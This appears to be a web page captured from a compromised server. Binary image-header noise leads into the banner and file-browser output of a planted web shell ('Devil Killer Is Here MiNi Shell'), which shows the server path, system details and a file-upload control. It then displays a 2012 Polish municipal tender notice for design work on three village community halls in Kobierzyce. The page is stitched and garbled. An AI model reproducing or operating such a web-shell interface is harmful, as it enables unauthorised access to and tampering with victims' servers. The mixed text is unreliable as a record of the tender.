JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120802/282910-N-2012.html

<p class="kh_header"><b>Kobierzyce: Wykonanie dokumentacji projektowych trzech niżej wymienionych zadań inwestycyjnych Gminy Kobierzyce:
1. Budowa świetlicy wiejskiej w miejscowości Tyniec nad Ślęzą na dz. nr 332/23, 332/25, 331/1 wraz z budową sieci wodociągowej 160 mm o długości ok. 200 mb na dz. nr 232/24.
2. Budowa świetlicy wiejskiej w miejscowości Cieszyce na dz. nr 144/15.
3. Budowa świetlicy wiejskiej w miejscowości Jaszowice na dz. nr 59/4.</b><br>
<b>Numer ogłoszenia: 282910 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobierzyce , al. Pałacowa 1, 55-040 Kobierzyce, woj. dolnośląskie, tel. 071 3111215, faks 071 3111252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych trzech niżej wymienionych zadań inwestycyjnych Gminy Kobierzyce:
1. Budowa świetlicy wiejskiej w miejscowości Tyniec nad Ślęzą na dz. nr 332/23, 332/25, 331/1 wraz z budową sieci wodociągowej 160 mm o długości ok. 200 mb na dz. nr 232/24.
2. Budowa świetlicy wiejskiej w miejscowości Cieszyce na dz. nr 144/15.
3. Budowa świetlicy wiejskiej w miejscowości Jaszowice na dz. nr 59/4..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie kompletnych dokumentacji projektowych budowy świetlic, zlokalizowanych na terenie Gminy Kobierzyce z podziałem na trzy zadania:
Część I  Budowa świetlicy wiejskiej w miejscowości Tyniec nad Ślęzą na dz. nr 332/23, 332/2, 331/1 wraz z budową sieci wodociągowej 160 mm o długości ok. 200 mb na dz. nr 232/24
Część II Budowa świetlicy wiejskiej w miejscowości Cieszyce na dz. nr 144/15.
Część III Budowa świetlicy wiejskiej w miejscowości Jaszowice na dz. nr 59/4
2. Zamawiający dopuszcza możliwość składania ofert częściowych tj. zgodnie z przyjętym podziałem na części I, II i III. Wykonawcy mogą składać ofertę na wykonanie wszystkich projektów wszystkich., lub dowolnie wybranych części zamówienia. 
3. Zamówienie obejmuje wykonanie kompletnej pełno branżowej dokumentacji projektowej z uzyskaniem na rzecz Zamawiającego decyzji pozwolenia na budowę z potwierdzeniem jej ostateczności. Do wykonawcy zamówienia należy:
1) Uzyskanie niezbędnych do realizacji zamówienia map, warunków, uzgodnień, decyzji, postanowień, wypisów, wyrysów itp. i dokonanie płatności za ich uzyskanie. Opłata przyłączeniowa za dostarczenie energii elektrycznej, wynikająca z umowy przyłączeniowej, dokonana będzie przez Zamawiającego
2) Wykonawca zobowiązany będzie do składania w imieniu Zamawiającego związanych z realizowanym projektem wniosków wraz z dokumentacją. Koszty z tym związane winne być ujęte w ofercie Wykonawcy.
3) Wykonawca opracuje w wersji elektronicznej oświadczenie inwestora o prawie do dysponowania nieruchomością na cele budowlane załączając komplet potwierdzających to prawo, uprzednio uzyskanych dokumentów.
4) Opracowanie dokumentacji:
a) koncepcji funkcjonalno-przestrzennej
b) projektu budowlanego (4 egz., w tym 2 egz. z oryginalnymi pieczątkami organów wydających pozwolenie na budowę), zaopatrzonego w oświadczenie o kompletności i dokonane uzgodnienia, w tym m. in. w zakresie sanitarno- epidemiologicznym, ochrony przeciwpożarowej oraz bezpieczeństwa i higieny pracy
c) projektu wykonawczego (4 egz.),
d) specyfikacji warunków technicznych wykonania i odbioru robót budowlanych (4 egz.),
e) przedmiaru robót (4 egz.),
f) kosztorysu inwestorskiego (1 egz.) ,
g) ew. innych opracowań niezbędnych do realizacji zamówienia, jak np:, inwentaryzacja zieleni, operat dendrologiczny, projekt organizacji ruchu zastępczego i docelowego, operat wodno prawny, opracowania branżowe, rozwiązania kolizji z istniejącą infrastrukturą (2 egz. + egzemplarze wymagane przez odpowiednie organy);
h) specyfikacji materiałów przewidzianych do wykonania inwestycji
z akceptacją Zamawiającego
i) wersji elektronicznej dokumentacji o zawartości niezbędnej dla zamieszczenia ogłoszenia o przetargu na roboty budowlane oraz kosztorysu inwestorskiego i przedmiaru robót
5) dokonywanie aktualizacji kosztorysu inwestorskiego w oparciu o aktualne składniki cenotwórcze i dostarczenie ich na żądanie Zamawiającego w terminie do dwóch lat od zakończenia realizacji zamówienia;
6) odpowiadanie na pytania zadawane przez startujących w przetargu na budowę świetlicy w Cieszycach, Jaszowicach i Tyńcu nad Ślęzą 
7) przekazywanie raz na miesiąc pisemnej informacji Zamawiającemu
o stanie zaawansowania prac;
8) Uczestniczenie w spotkaniach konsultacyjnych z udziałem Zamawiającego i przedstawicieli lokalnej społeczności - w tym Rady Sołeckiej i Radnych Gminy Kobierzyce,
9) Przed złożeniem wniosku o pozwolenie na budowę wykonania robót budowlanych projekt podlega uzgodnieniu przez Zamawiającego.
4. Zakładana charakterystyka projektowanego obiektu:
1) Część I  Budowa świetlicy wiejskiej w miejscowości Tyniec nad Ślęzą na dz. nr 332/23, 332/2, 331/1 wraz z budową sieci wodociągowej 160 mm o długości ok. 200 mb na dz. nr 232/24
a) Proponuje się, aby projektowany budynek świetlicy był w kształcie litery L. Budynek winien posiadać:
- salę główną ( na około 120 osób) 
- bibliotekę o wym. ok. 25 m2
- zaplecze sportowe składające się z: 2 pomieszczeń  dla drużyn wraz z zapleczem sanitarnym, 1 pomieszczenia dla sędziego wraz z zapleczem sanitarnym oraz pomieszczenia gospodarczego (zgodnie z załączonym schematem)
- salę przeznaczoną dla punktu przedszkolnego
- zaplecze kuchenne (podgrzewalnia posiłków) 
- niezbędne pomieszczenia towarzyszące m.in. toalety, szatnia, magazynek
- zagospodarowanie terenu w tym miejsca postojowe, ciągi komunikacyjne, plac zabaw
b) Należy także zaprojektować piłkochwyt za bramką (drugą licząc od projektowanej świetlicy);
c) Załącznik nr 11  -  stanowi proponowany schemat zaplecza sportowego - Tyniec nad Ślęzą. 
2) Część II Budowa świetlicy wiejskiej w miejscowości Cieszyce na dz. nr 144/15.
a) Proponuje się aby budynek posiadał:
- salę główną o pow. ok. 90,00 m2 
- salę zajęć o pow. ok. 25,00 m2
- zaplecze kuchenne (podgrzewalnia posiłków) o pow. ok. 20,00 m2 
- niezbędne pomieszczenia towarzyszące m.in. toalety, szatnia, magazynek
- zagospodarowanie terenu w tym miejsca postojowe (10-15 miejsc parkingowych), ciągi komunikacyjne, plac zabaw, boisko do gry w piłkę nożną, boisko uniwersalne do gry w siatkówkę i koszykówkę. Należy zwrócić uwagę na zagospodarowanie całości działki.
3) Część III Budowa świetlicy wiejskiej w miejscowości Jaszowice na dz. nr 59/4
a) Proponuje się aby budynek posiadał:
- salę główną o pow. ok. 50,00 m2 
- bibliotekę mieszczącą ok. 7500 książek
- zaplecze kuchenne (podgrzewalnia posiłków) o pow. ok. 17,00 m2 
- niezbędne pomieszczenia towarzyszące m.in. toalety, szatnia, magazynek
- zagospodarowanie terenu w tym miejsca postojowe (20 miejsc parkingowych + 1 miejsce dla autobusu, umieszczone w taki sposób aby autobus mógł swobodnie zawrócić), ciągi komunikacyjne, plac zabaw (2- 3 podstawowe zabawki np. zjeżdżalnia, huśtawka. Należy zwrócić uwagę na sposób oraz miejsce odprowadzenia wody deszczowej z terenu działki.
5. NADZÓR AUTORSKI
Pełnienie nadzoru autorskiego w okresie realizacji robót budowlanych na podstawie odrębnej umowy za odrębnym, wynagrodzeniem. W ramach nadzoru wymagany będzie udział w naradach roboczych, radach budowy, odbiorach itp. 
Nadzór autorski rozpocznie się na etapie rozpoczęcia robót budowlanych.
a) Projektant zobowiązuje się do sprawowania nadzoru autorskiego w zakresie zgodności wykonywanych robót z projektem oraz uzgadniania i wprowadzania ewentualnych rozwiązań zamiennych w stosunku do przewidzianych w projekcie w okresie realizacji robót prowadzonych w oparciu o dokumentację projektową będącą przedmiotem umowy na warunkach określonych poniżej. Pełen zakres nadzoru autorskiego, przy uzgodnionym wynagrodzeniu na etapie obecnej procedury, będzie przedmiotem odrębnej umowy zawartej już na etapie wykonawstwa robót budowlanych w oparciu o opracowana dokumentację.  
b) Uzgodnione wynagrodzenie ryczałtowe za nadzór autorski obejmuje wszystkie koszty  związane z prowadzonym nadzorem. 
c) Zakres nadzoru autorskiego obejmuje czynności wynikające z treści ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (t.j. z 2006 Dz. U. Nr 156, poz. 1118 z  późniejszymi zmianami).
6. Zamawiający informuje o planowanym dofinansowaniu Budowy świetlicy wiejskiej w miejscowości Tyniec nad Ślęzą na dz. nr 332/23, 332/2, 331/1 wraz z budową sieci wodociągowej 160 mm o długości ok. 200 mb na dz. nr 232/24 w ramach działania 413 Wdrażanie lokalnych strategii rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.
7. Czas realizacji zamówienia: 7 miesięcy od daty podpisania umowy (wraz z uzyskaniem ostatecznego pozwolenia na budowę), w tym:
Opracowanie koncepcji programowo przestrzennej i zorganizowania spotkania konsultacyjnego: 1 miesiąc od dnia zawarcia umowy;
Wniesienie uwag przez Zamawiającego: 21 dni od spotkania konsultacyjnego;
Przedstawienie do akceptacji koncepcji po uwzględnieniu uwag Zamawiającego 14 dni po otrzymaniu uwag. 
Akceptacja koncepcji przez Zamawiającego po uwzględnieniu uwag: 7 dni od otrzymania poprawionej koncepcji.
Termin uzyskania pozwolenia na budowę ( wraz z potwierdzeniem ostateczności decyzji pozwolenia na budowę) i dostarczenia Zamawiającemu kompletnej dokumentacji: 7 miesięcy od dnia zawarcia umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zgodnie z ustawą PZP art 67</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-0, 71.22.20.00-0, 71.32.22.00-3, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna wykazanie wykonanej w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; usługi projektowej (zbieżnej z przedmiotem zamówienia) oraz załączeniem dokumentów (referencji) potwierdzających, że ww. usługa została wykonana należycie.
Minimalne wymaganie dla I części zamówienia
spełnienia warunku to udokumentowanie co najmniej 1 (jednej) zakończonej usługi projektowej polegającej na opracowaniu projektu budowlanego obiektu o minimalnej kubaturze  2.000 m3	
Minimalne wymaganie dla II części zamówienia
spełnienia warunku to udokumentowanie co najmniej 1 (jednej) zakończonej usługi projektowej polegającej na opracowaniu projektu budowlanego obiektu o minimalnej kubaturze  2.000 m3

Minimalne wymaganie dla III części zamówienia
spełnienia warunku to udokumentowanie co najmniej 1 (jednej) zakończonej usługi projektowej polegającej na opracowaniu projektu budowlanego obiektu o minimalnej kubaturze  2.000 m3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna:
- dysponowanie  osobami zdolnymi do wykonania  zamówienia,  w  szczególności  osobami, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem  niezbędnym  do  wykonania zamówienia, przynależącymi do Izby Inżynierów Budownictwa lub Izby Architektów oraz posiadającymi następujące uprawnienia do projektowania  w specjalnościach:
a)    architektonicznej- 1 osoba
b)	konstrukcyjnej - 1 osoba
d)	instalacyjnej w zakresie sieci instalacji sanitarnych  - 1 osoba - włącznie dla części I tj. Budowa świetlicy wiejskiej w miejscowości Tyniec nad Ślęzą na dz. nr 332/23, 332/2, 331/1 wraz z budową sieci wodociągowej 160 mm o długości ok. 200 mb na dz. nr 232/24.
e)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych - 1 osoba.
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami oraz złożonym i podpisanym Oświadczeniem, że osoby które będą wykonywać zamówienie posiadają wymagane uprawnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie z treścią SIWZ pkt XV</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 12:00, miejsce: Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pok. 50.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje o planowanym dofinansowaniu Budowy świetlicy wiejskiej w miejscowości Tyniec nad Ślęzą na dz. nr 332/23, 332/2, 331/1 wraz z budową sieci wodociągowej 160 mm o długości ok. 200 mb na dz. nr 232/24 w ramach działania 413 Wdrażanie lokalnych strategii rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa świetlicy wiejskiej w miejscowości Tyniec nad Ślęzą na dz. nr 332/23, 332/25, 331/1 wraz z budową sieci wodociągowej 160 mm o długości ok. 200 mb na dz. nr 232/24..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Proponuje się, aby projektowany budynek świetlicy był w kształcie litery L. Budynek winien posiadać:
-	salę główną ( na około 120 osób) 
-	bibliotekę o wym. ok. 25 m2
-	zaplecze sportowe składające się z: 2 pomieszczeń  dla drużyn wraz z zapleczem sanitarnym, 1 pomieszczenia dla sędziego wraz z zapleczem sanitarnym oraz pomieszczenia gospodarczego (zgodnie z załączonym schematem)
-	salę przeznaczoną dla punktu przedszkolnego
-	zaplecze kuchenne (podgrzewalnia posiłków) 
-	niezbędne pomieszczenia towarzyszące m.in. toalety, szatnia, magazynek
-	zagospodarowanie terenu w tym miejsca postojowe, ciągi komunikacyjne, plac zabaw
b)	Należy także zaprojektować piłkochwyt za bramką (drugą licząc od projektowanej świetlicy);
c)	Załącznik nr 11  -  stanowi proponowany schemat zaplecza sportowego - Tyniec nad Ślęzą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-0, 71.22.20.00-0, 71.32.22.00-3, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa świetlicy wiejskiej w miejscowości Cieszyce na dz. nr 144/15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Proponuje się aby budynek posiadał:
-	salę główną o pow. ok. 90,00 m2 
-	salę zajęć o pow. ok. 25,00 m2
-	zaplecze kuchenne (podgrzewalnia posiłków) o pow. ok. 20,00 m2 
-	niezbędne pomieszczenia towarzyszące m.in. toalety, szatnia, magazynek
